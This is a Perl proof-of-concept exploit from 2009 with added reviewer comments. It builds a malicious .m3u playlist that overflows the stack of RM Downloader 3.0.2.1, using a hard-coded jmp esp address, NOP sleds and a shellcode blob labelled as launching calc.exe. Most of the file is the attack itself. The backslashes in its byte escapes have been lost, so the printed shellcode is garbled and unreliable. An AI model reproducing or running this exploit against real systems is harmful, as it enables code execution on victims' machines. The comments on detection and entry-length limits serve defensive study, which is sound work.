
# Title : RM Downloader 3.0.2.1(.M3U File) Stack Overflow exploit
# Published : 2009-12-14
# Author : Vinod Sharma


#!/usr/bin/perl
# *********************************************************
# *  RM Downloader 3.0.2.1(.M3U File) Stack Overflow exploit   *
# *********************************************************
#
# Author: Vinod Sharma
# Download :  http://www.rm-to-mp3.net/downloads/RMDownloader.exe
# Tested : Windows XP SP2 (En)
# Thanks to exploit-db,packetstormsecurity and all security folks
# Originally published at :http://securitygyan.com/2009/12/14/rm-downloader-m3u-exploit/
#Vulnerability discovered by CYBER-ZONE(http://www.exploit-db.com/exploits/8404)
#::::::NOTE: This exploit is for educational purposes only. If you use it for any malicious activity, the author will not bear any:::
#::::responsibility.
# Proof-of-concept generator: builds one oversized playlist entry and appends
# it to "exploit.m3u" in the current working directory. The entry is assembled
# below as: playlist header, "http://F" prefix, first filler run, a packed
# 32-bit value, second filler run, the payload blob, then 26280 "A" characters.
#
# NOTE(review): the string literals in this listing hold plain characters such
# as "x90" and a trailing "n" where byte escapes would normally be expected, so
# the page appears to have lost characters during extraction. Lengths and
# offsets read from this listing describe the text as printed; check the
# original advisory before deriving byte-level detection signatures from it.
#
# Defender view: a single .m3u entry tens of kilobytes long is abnormal for a
# playlist, so entry-length limits in mail/web gateways and parsers are a
# reasonable control. The header above lists only Windows XP SP2 as tested.

# Playlist magic line that the target parser expects at the start of the file.
my $Header = "#EXTM3Un";
# pack('V', ...) emits the value as 4 bytes, little-endian. A hard-coded
# address inside an application DLL presumably relies on that module loading
# at a fixed base (no ASLR/rebasing) -- TODO confirm against the DLL.
my $eip= pack('V', 0x01be8b59);  # jmp esp from RDcodec02.dll
# Filler run placed ahead of the packed address in the entry (see $ex).
my $nop= "x90" x 256;
# Short filler run placed between the packed address and the payload.
my $nop2="x90" x 8;
# Declared but never referenced again in the visible script.
my $nop3="x90" x 100;

# Opaque payload blob; the author's label says it launches calc.exe, which is
# not verified here. $shellcode is never declared with "my" and the file has
# no "use strict", so the right-hand $shellcode is an undefined package
# variable that stringifies to "" before the concatenation.
####Calc.exe######
$shellcode = $shellcode.
"x31xc9xdaxd4xb1x33xbdxecx71x94xdexd9x74x24xf4".
"x5fx31x6fx15x03x6fx15x83x2bx75x76x2bx4fx9exff".
"xd4xafx5fx60x5cx4ax6exb2x3ax1fxc3x02x48x4dxe8".
"xe9x1cx65x7bx9fx88x8axccx2axefxa5xcdx9ax2fx69".
"x0dxbcxd3x73x42x1exedxbcx97x5fx2axa0x58x0dxe3".
"xafxcbxa2x80xedxd7xc3x46x7ax67xbcxe3xbcx1cx76".
"xedxecx8dx0dxa5x14xa5x4ax16x25x6ax89x6ax6cx07".
"x7ax18x6fxc1xb2xe1x5ex2dx18xdcx6fxa0x60x18x57".
"x5bx17x52xa4xe6x20xa1xd7x3cxa4x34x7fxb6x1ex9d".
"x7ex1bxf8x56x8cxd0x8ex31x90xe7x43x4axacx6cx62".
"x9dx25x36x41x39x6execxe8x18xcax43x14x7axb2x3c".
"xb0xf0x50x28xc2x5ax3exafx46xe1x07xafx58xeax27".
"xd8x69x61xa8x9fx75xa0x8dx40x94x61xfbxe8x01xe0".
"x46x75xb2xdex84x80x31xebx74x77x29x9ex71x33xed".
"x72x0bx2cx98x74xb8x4dx89x16x5fxdex51xf7xfax66".
"xf3x07";


# Assemble the playlist entry. "x" binds tighter than ".", so only the final
# "A" is repeated 26280 times; everything before it is concatenated once.
$ex="http://F".$nop.$eip.$nop2.$shellcode."A" x 26280 ;

# Two-argument open with a bareword handle in append mode: each run adds
# another copy to any existing exploit.m3u. The return value is not checked,
# so a failed open is not reported before the print below.
open(MYFILE,'>>exploit.m3u');

# Header and entry are written back to back with no separator added here.
print MYFILE $Header.$ex;

# close() result is also unchecked, so a buffered write error would go unnoticed.
close(MYFILE);